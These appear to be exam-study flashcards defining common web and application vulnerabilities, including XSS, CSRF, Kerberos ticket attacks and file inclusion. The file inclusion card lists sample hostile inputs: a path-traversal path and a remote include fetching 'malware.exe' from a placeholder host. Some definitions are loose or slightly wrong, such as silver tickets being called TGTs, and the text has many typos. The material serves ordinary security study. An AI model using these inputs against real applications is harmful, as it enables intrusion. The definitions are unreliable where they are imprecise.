Application Based Vulnerabilities

Question 1

Injection Attacks (Application Vulnerabilities)

Answer 1

• insertion of additonal code or information via a data input from a client to the application
• most common through SQL, but can also be HTLM, command or code - preventable through input validation and least privilege for databases

Question 2

SQL Injection (Application Vulnerabilities)

Answer 2

• injectinon of SQL commands, specific injection

Question 3

Authentication (Application Vulnerabilities)

Answer 3

• credential brute forcing
• session hijacking - attacks web session control mechanism by taking over a session by guessing session token
• redirect - sends user to malicious page
• default credentials
• weak credentials

Question 4

Kerberos Authentication (Application Vulnerabilities)

Answer 4

• kerberos is a system of tickets that grant devices permission to communicate over a non secure network and ID themselves
• golden ticket - Kerberos ticket granting ticket TGT, can be used to access any kerberos service
• silver tickets - kerberos TGT, can be used for a specific kerberos service

Question 5

Parameter Pollution - Authorization (Application Vulnerabilities)

Answer 5

• HTTP parameters are modified in order to conduct malicious attack

Question 6

Insecure Direct Object Reference - Authorization (Application Vulnerabilities)

Answer 6

• app provides direct access to an object based on user supplied input

Question 7

Cross Site Scripting XSS (Application Vulnerabilities)

Answer 7

• attacker embeds malicious scripting commands on a trusted website, target is the user
• stored/persistent - data provided by attacker is saved on server
• reflected - non persistent, activated through link on site
• DOM - Document Object Model DOM is vulnerable, victims browser is exploited (client side XSS)

Question 8

Cross Site Request Forgery CSRF (Application Vulnerabilities)

Answer 8

• attacker forces user to execute actions on web server which they authenticated, cannot see web servers response but this can have the victim transfer funds, change passwords and more

Question 9

Clickjacking (Application Vulnerabilities)

Answer 9

• uses multiple transparent layers to trick a user into clicking on a button or link on a page when they were intending to click on the actual page, hyperlinks concealed under legit clickable content

Question 10

Security Misconfiguration (Application Vulnerabilities)

Answer 10

• attacks rely on app or server using insecure settings
• Directory traversal - allows access to restricted directories and for command execution outside of webservers root directory
• Cookie Manipulation - DOM based cookie manipulation that allows a script to write data into the value of a client stored cookie

Question 11

File Inclusion (Application Vulnerabilities)

Answer 11

• includes a file into targeted application by exploiting a dynamic file inclusion mechanism, usually due to lack of input validation
• Local - ../../uploads/malware.exe
• remote - https.www.xyz.com/malware.exe

Question 12

Insecure Code Practices (Application Vulnerabilities)

Answer 12

• commends in source code,
• lack of error handling
• verbose error handling
• hard coded credentials - credentials are wirtten in source *code instead of inclusion file
• race conditions
• unauthorized use of function/unprotected API
• hidden elements
• lack of code signing